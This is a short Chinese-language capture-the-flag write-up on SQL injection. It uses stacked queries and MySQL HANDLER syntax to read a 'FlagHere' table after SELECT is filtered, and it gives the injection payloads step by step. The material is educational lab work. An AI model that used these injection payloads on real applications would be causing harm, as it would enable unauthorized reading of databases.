sql注入 --堆叠注入以及handler语法
利用handler进行sql注入
1.打开题目就是一个输入框
2.输入查看一下过滤
过滤了很多,之后可以尝试第一种方法堆叠注入
1';show databases-- + (#)
3.之后查表
show tables from supersqli-- +
4.之后查询字段
show columns from FlagHere-- +
5.到了这里还没有读取到数据,又过滤了select函数 可以使用不怎么常见的handler语法
参考
https://blog.csdn.net/qq_44927883/article/details/110469781
6.使用handler 读取数据 这个handler只能一行一行的读取使用read first、next、prev、last等函数去读取,详细的可以参考上面的文章
1.打开表
handler table_name open
2.读取第一行
handler table_name read first或者(next)
3.关闭表
handler table_name close
针对这个题所以使用
';handler FlagHere open;handler FlagHere read next;handler FlagHere close;#或者-- +
